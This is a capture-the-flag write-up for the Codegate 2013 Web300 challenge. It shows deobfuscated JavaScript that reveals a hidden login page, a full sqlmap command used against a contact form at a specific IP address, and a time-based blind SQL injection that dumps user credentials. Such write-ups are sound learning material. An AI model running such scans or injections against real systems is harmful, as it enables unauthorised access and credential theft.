Codegate2013 Web300 Writeup

This problem first presents a letter, in which the author asks Sherlock to find someone related to hacking case. The letter gives a blog address as clue to find the wanted one.

By analyzing the blog js code we found the js/secret.js rather suspicious. By unpacking and decrypting it we get the following code:

eval $(document).ready(function(){var cnt=0;$('a.S').click(function(){cnt++;if(cnt==10)   {$('#popup').bPopup({contentContainer:'.content',loadUrl:'./d56b699830e77ba53855679cb1d252da.php'});cnt=0}})});

, which discloses a secret login page url: http://58.229.122.17:2218/d56b699830e77ba53855679cb1d252da.php (md5 of “login”). It can be accessed by clicking ten times on “Grey” logo.

Then we find a post form at http://58.229.122.17:2218/contact.php, we use sqlmap to identify if there is possibility of sqli. Luckily there is.

python sqlmap.py -u "http://58.229.122.17:2218/contact.php" --data="your_name=1&your_email=1@1.com&question=2&your_message=1&contact_submitted=send"

sqlmap identifies time-based blind sqli on parameter “question”. We then try to dump possible databases. Time-based blind sqli is slow and sensitive to network traffic load, so remember not to press your network connection when do time-based blind sqli.

Databases “the_grey” is found, with two table – “contact” and “user”. “user” contains three columns “no”, “id”, md5 “password” and five rows. Using this information we login the blog and in page http://58.229.122.17:2218/my_page.php?user=victor we get the one who intend to hack Hound Co.,Ltd. and time the company is hacked.

That’s the key.